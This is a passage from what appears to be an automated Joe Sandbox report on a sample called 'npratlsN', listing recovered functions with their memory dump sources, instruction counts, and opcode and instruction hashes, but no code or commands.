                                                                                                                                                                          Function 2C898268 Relevance: .3, Instructions: 299COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a11752d438b056269b53ebd579022728d0c0234e7abf90b214c0d52c568d3896
                                                                                                                                                                          • Instruction ID: 82d02557cfd2cc39349a27706a5b2514629da6ddecaaa894c25f77e9c8dc5a6a
                                                                                                                                                                          • Opcode Fuzzy Hash: a11752d438b056269b53ebd579022728d0c0234e7abf90b214c0d52c568d3896
                                                                                                                                                                          • Instruction Fuzzy Hash: 80D10374A012698FDB64DF69C950BDEBBB2AB88300F1085E9D50DA7390DB349E85CF51
                                                                                                                                                                          Function 2C8982D0 Relevance: .3, Instructions: 257COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8c38604b4d949110f4eaa8c1eabc92a435bf44eff0a5d6f2db83556e8a933fa9
                                                                                                                                                                          • Instruction ID: 46399386064aa302979b84eb40f030d2800eda9cecceff97cc219e3f12ee27fc
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c38604b4d949110f4eaa8c1eabc92a435bf44eff0a5d6f2db83556e8a933fa9
                                                                                                                                                                          • Instruction Fuzzy Hash: 7EC1E074A012698FDB64DF69C990BDEBBB2BB88300F1085E9D50DA7390DB349E85CF51
                                                                                                                                                                          Function 2C8982E0 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7d1ad660f23c5f677956a61b69831a9f6212cbacf0a21c3f1d0e529b6cfd1c8b
                                                                                                                                                                          • Instruction ID: aae01b1de384586ea679ecd1dfcdfb8bc22683dbce7431e6762a4c6cce8d3157
                                                                                                                                                                          • Opcode Fuzzy Hash: 7d1ad660f23c5f677956a61b69831a9f6212cbacf0a21c3f1d0e529b6cfd1c8b
                                                                                                                                                                          • Instruction Fuzzy Hash: E8C1E074A012698FDB64DF69C990BDEBBB2BB88300F1085E9D50DA7390DB349E85CF51
                                                                                                                                                                          Function 2B7C6B60 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a061edb83b2387b9dab83d7127310f20449711438b50630289296167d16df0cd
                                                                                                                                                                          • Instruction ID: 3cb5738d3d4f9628d72c73d275aea4ecb3a1455248ed487576e7ff1c26a142cd
                                                                                                                                                                          • Opcode Fuzzy Hash: a061edb83b2387b9dab83d7127310f20449711438b50630289296167d16df0cd
                                                                                                                                                                          • Instruction Fuzzy Hash: 8371F4347006458FCF14DF29C898A6E7BE5EF49740B1500AAF905CB3A2DB74EC41DB90
                                                                                                                                                                          Function 2C898F10 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 66fbd7b1f3ed00c0ba92d6a46f21ce90ded6103d36b5949070eb9d73ba149a53
                                                                                                                                                                          • Instruction ID: 6ab82ecd9102aa0057248d1854bc430ae0ea5af4fb39bf483238c80eeac68ac1
                                                                                                                                                                          • Opcode Fuzzy Hash: 66fbd7b1f3ed00c0ba92d6a46f21ce90ded6103d36b5949070eb9d73ba149a53
                                                                                                                                                                          • Instruction Fuzzy Hash: C671A274E01259DFCB04DFA9D894AEEBBF2FF88310F10852AD519AB394DB346945CB90
                                                                                                                                                                          Function 2C898030 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0f92de19a13c16d9020740093ba149f08a8552028b7ed0b1a6f4edf79a7af75a
                                                                                                                                                                          • Instruction ID: a548f2e7cd6889845787f58eb1f42cda38216166750e23ddafa554b01c73788b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0f92de19a13c16d9020740093ba149f08a8552028b7ed0b1a6f4edf79a7af75a
                                                                                                                                                                          • Instruction Fuzzy Hash: 7961E574E01219DFDB08DFE9E990A9EBBF2BF88310F14D529E908BB355DA309941CB51
                                                                                                                                                                          Function 2B7CC040 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5d2728604491079037b09a7550023dbaecaeacdbb94b6148ce0a716f87e0731f
                                                                                                                                                                          • Instruction ID: 50a51eb32777697fc18b98e3becb570ae160ba1788ed26de5ecfc0e258b97325
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d2728604491079037b09a7550023dbaecaeacdbb94b6148ce0a716f87e0731f
                                                                                                                                                                          • Instruction Fuzzy Hash: D1519274E012189FDB54DFBAD594A9DBBF2FF89300F248169E819AB364DB30A805CF50
                                                                                                                                                                          Function 2C898F20 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: aa30ec880c9d41f13e88dec8b658b1f7187ba517c64e1ea32f757a6ddacf0c0a
                                                                                                                                                                          • Instruction ID: e7f5b035cdad431e824385755c2eb80624c1f743c4f3416ae7f5282e8e5f32cd
                                                                                                                                                                          • Opcode Fuzzy Hash: aa30ec880c9d41f13e88dec8b658b1f7187ba517c64e1ea32f757a6ddacf0c0a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3551B074E01219DFDB04DFA9D890AEEBBF2BF88300F10852AE519AB394DB355945CB90
                                                                                                                                                                          Function 2C898898 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9e4081482cd4e948b2b7405fa548a981f99e61ee92560a99f2e00c59797ec6b4
                                                                                                                                                                          • Instruction ID: 6cd2ac0e86a9873ff89fcabb195993a66180ecbbe285c212f8d6aa1a19aafbaf
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e4081482cd4e948b2b7405fa548a981f99e61ee92560a99f2e00c59797ec6b4
                                                                                                                                                                          • Instruction Fuzzy Hash: A251B374E01219DFCB44DFA9D594ADEBBF2FF88300F208429D515AB350DB346A45CB90
                                                                                                                                                                          Function 2C95EEB8 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8c8d2ab1692d95abb6268d3859f6a44fa556a6ce3ade53093464ce742838803a
                                                                                                                                                                          • Instruction ID: 2e899cc4c6dce50b33888b4d856b0a4087a8f597930f22d186e38ab540ad3252
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c8d2ab1692d95abb6268d3859f6a44fa556a6ce3ade53093464ce742838803a
                                                                                                                                                                          • Instruction Fuzzy Hash: E8511474E05249CFCB04DFA9D594ADDBBF6BF49300F20912AE805B7250DB799A4ACF44
                                                                                                                                                                          Function 2C8974A5 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 73424118f581ff5ab4988fb48b86173b3189d326bb683387b10876e011bd2e21
                                                                                                                                                                          • Instruction ID: 5d7dac5889c402e1189dfbbabe15b7d336ed85e958211c3f0a8c99afd3c1b793
                                                                                                                                                                          • Opcode Fuzzy Hash: 73424118f581ff5ab4988fb48b86173b3189d326bb683387b10876e011bd2e21
                                                                                                                                                                          • Instruction Fuzzy Hash: CA51B131E00219DBDB05CFA9C990ADEBBF1BF89710F248629E505B7390DB30AD46CB91
                                                                                                                                                                          Function 2B7C3400 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 738c76add4bf4f8c259273117608771115f4b9c359b551cf89124ddd97959d98
                                                                                                                                                                          • Instruction ID: cf765831bc62d3de8d6f0776f6bb0fac4a5696c37e873e2c4a48ab6b779a950d
                                                                                                                                                                          • Opcode Fuzzy Hash: 738c76add4bf4f8c259273117608771115f4b9c359b551cf89124ddd97959d98
                                                                                                                                                                          • Instruction Fuzzy Hash: 8751A574E01309CFCB08DFA9D59499DBBB2FF89315F209169E805AB364DB35A942CF50
                                                                                                                                                                          Function 2C8974F5 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4ca186510ed5fe4985da192081dd817bd08fe8ab3f7a9afe34e4020b6454612a
                                                                                                                                                                          • Instruction ID: 0682975002fbe0b49a67fac2d555689eb0a797c899ac300fea73f31cbe340554
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ca186510ed5fe4985da192081dd817bd08fe8ab3f7a9afe34e4020b6454612a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3951A731E05219DFDB15CFA9C990ADEBBB1AF85700F24C52AE505B7390EB30AD46CB91
                                                                                                                                                                          Function 2C89749D Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0b46a267fd84d277adbb07642c0864b005b1f23e7af0d8b0c228695453307295
                                                                                                                                                                          • Instruction ID: 29e417556810153b85f667e54cd7b1cad878fb3f31904071af3160eb205a6bc5
                                                                                                                                                                          • Opcode Fuzzy Hash: 0b46a267fd84d277adbb07642c0864b005b1f23e7af0d8b0c228695453307295
                                                                                                                                                                          • Instruction Fuzzy Hash: 4141A231E00219DBDB05CFA9C990ADEB7F1AF88700F248529E515B7390DB30AD46CB95
                                                                                                                                                                          Function 2B7C9193 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 359262b7bd171428e4296bf92671b58ddf056b73dfbd963be89493b196fe66c7
                                                                                                                                                                          • Instruction ID: 891a602f6c2f8bb8ca1ca6a2b84bc213cdaaa3bc1a0bffb140d961b3d0885b6b
                                                                                                                                                                          • Opcode Fuzzy Hash: 359262b7bd171428e4296bf92671b58ddf056b73dfbd963be89493b196fe66c7
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A415D35A04259DFCF42CFA5C849B8EBFB2EF89314F048159FA559B292D731EA14CB50
                                                                                                                                                                          Function 2C898A68 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 382e9dc91b98a746ae50d1cb2a0feacd7ed99ea3fc2d473d50bcfb8a42ed7967
                                                                                                                                                                          • Instruction ID: 27e0c3bf17a5d43f1cfbd0cd63a61e296d7c35211c8205aba766418f4b299d0d
                                                                                                                                                                          • Opcode Fuzzy Hash: 382e9dc91b98a746ae50d1cb2a0feacd7ed99ea3fc2d473d50bcfb8a42ed7967
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A4165B4D01259DFCB00CFA9D584A9EFBF1AF09310F24902AE918AB220D375AA46CF54
                                                                                                                                                                          Function 2C897248 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 54b786ff58db2fddaad0c8267ee18bea54bb1ee05b6a15b455ddbe382efb18de
                                                                                                                                                                          • Instruction ID: 9070441f9e9f2600a481d6f7c3020e56068b7c7bd3d1ee4518f151dd6318a162
                                                                                                                                                                          • Opcode Fuzzy Hash: 54b786ff58db2fddaad0c8267ee18bea54bb1ee05b6a15b455ddbe382efb18de
                                                                                                                                                                          • Instruction Fuzzy Hash: 854167B9D042589FCF00CFA9D584A9EFBF1AB19310F10A42AE914BB310D375AA41CF68
                                                                                                                                                                          Function 2C8979A8 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9ec073094c6645e12b0043181fe4c6ecea5e4be855f2dbf0c189f85746438b76
                                                                                                                                                                          • Instruction ID: b77d3f67c45a28ac048a3f42ca30a93e58914045ed4b80615bc8866082ede00a
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ec073094c6645e12b0043181fe4c6ecea5e4be855f2dbf0c189f85746438b76
                                                                                                                                                                          • Instruction Fuzzy Hash: 544168B9D042589FDF10CFA9D584ADEFBF1AB19310F14A42AE914BB310D335AA41CF68
                                                                                                                                                                          Function 2C898A70 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7429ff5f25b305ba96bba315b707ce64c5e42858c57f77eeda5530a17a420d75
                                                                                                                                                                          • Instruction ID: aa7684d05fea4c0c01697783ce6c664bd92a5f69e4b4c925d07836e948b62497
                                                                                                                                                                          • Opcode Fuzzy Hash: 7429ff5f25b305ba96bba315b707ce64c5e42858c57f77eeda5530a17a420d75
                                                                                                                                                                          • Instruction Fuzzy Hash: 524155B4D05259DFCB00CFA9D584A9EFBF1BB49310F24906AE858BB224D374A945CF54
                                                                                                                                                                          Function 2C95EEC8 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c666c705086578ff7ea8132c54dd4b7e885a6f52d75856961a90f48e25ff6cad
                                                                                                                                                                          • Instruction ID: 7f10972473aa848a0cd8a933ef222d8ee4159a0ec1c131ba50f87ded465ca4c3
                                                                                                                                                                          • Opcode Fuzzy Hash: c666c705086578ff7ea8132c54dd4b7e885a6f52d75856961a90f48e25ff6cad
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B41E274E01248CFDB04DFA9D584ADDBBF2BF48300F209129E815A7294DB795A4ACF54
                                                                                                                                                                          Function 2B7C44D0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: dc6d9df166b4f99d7089be044dcef5fa9fb26cbbf97050dd3f3bf768ddfbc6d4
                                                                                                                                                                          • Instruction ID: eec1dbdcae9512529bd15473526f6daa5ac435089b0a25f79d966be17d7dba6a
                                                                                                                                                                          • Opcode Fuzzy Hash: dc6d9df166b4f99d7089be044dcef5fa9fb26cbbf97050dd3f3bf768ddfbc6d4
                                                                                                                                                                          • Instruction Fuzzy Hash: 7431A1356011A9DFCF019FA4E888AAF7BA2EF98310F044028F906CB254CB39CD65CB90
                                                                                                                                                                          Function 2B7C8A2D Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 019c04fab76642c4f2bd615d62e71d957d31df8ed0bddf85325443030c47d6a8
                                                                                                                                                                          • Instruction ID: b1f5b4a0af928615045ddcb943eb9de761a8d93fb3d46a502d2bb7a7a1145b54
                                                                                                                                                                          • Opcode Fuzzy Hash: 019c04fab76642c4f2bd615d62e71d957d31df8ed0bddf85325443030c47d6a8
                                                                                                                                                                          • Instruction Fuzzy Hash: ED31D031A04605DFCB01CF2CD8849AFBBB5FF49320F1485AAE948C7215D731F9228BA1
                                                                                                                                                                          Function 2B7C6E08 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 32f29703c740f71b2f7da533e8c105e432a2de8565ca98dea623048001570643
                                                                                                                                                                          • Instruction ID: 434e015c0e969ebe4a00b2e894abb79d7a8bd7f11a427c14bd40e7a55f57c2cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 32f29703c740f71b2f7da533e8c105e432a2de8565ca98dea623048001570643
                                                                                                                                                                          • Instruction Fuzzy Hash: 652180317042159FDB042A29C4E4A7F6697BFC8B54F54843EE506CB395EF6ACC829782
                                                                                                                                                                          Function 2B7C1B58 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6b21e3494d351609f93c5f4536dcaca3385926d1cc4f49e41140267b6d71c3ad
                                                                                                                                                                          • Instruction ID: b29624d8f76f14f1fe53c9219cd2e472032fea2f5be6a10fa768868d3daea4fc
                                                                                                                                                                          • Opcode Fuzzy Hash: 6b21e3494d351609f93c5f4536dcaca3385926d1cc4f49e41140267b6d71c3ad
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E21AE75A001069FCF14DF64C4509AF77B5AB99764B20C06EE849CB385EA38EA47CBD2
                                                                                                                                                                          Function 2853D578 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3073747055.000000002853D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2853D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2853d000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 85f9e74b81b01b2b5666b614949b7e0668006f2d19492599df26e8f336db6929
                                                                                                                                                                          • Instruction ID: b2d338cf2162e199aab51fb6a0c2c937f036c0d5c46a6936a114114ac679ba81
                                                                                                                                                                          • Opcode Fuzzy Hash: 85f9e74b81b01b2b5666b614949b7e0668006f2d19492599df26e8f336db6929
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D2122B1505200DFCB01DF14DAC0F1ABFB5FB98314F24C569F9090B25AC336E656CAA1
                                                                                                                                                                          Function 2B7C5178 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3cdaaa7ffb1a6c5d0d53a8ce047569bad4aa809fd4c5080c52faafc6e15d7ad2
                                                                                                                                                                          • Instruction ID: 2a33e3fdd29a93de2e17997f1fad49cff7de7f5e80fb965e5a5f8580766e2af7
                                                                                                                                                                          • Opcode Fuzzy Hash: 3cdaaa7ffb1a6c5d0d53a8ce047569bad4aa809fd4c5080c52faafc6e15d7ad2
                                                                                                                                                                          • Instruction Fuzzy Hash: 2C21AE39701661CBCB159A6AC868A2FB3D6BFC9761F04506DE906CB341CF3ADC0287C0
                                                                                                                                                                          Function 2854D044 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3074012503.000000002854D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2854D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2854d000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
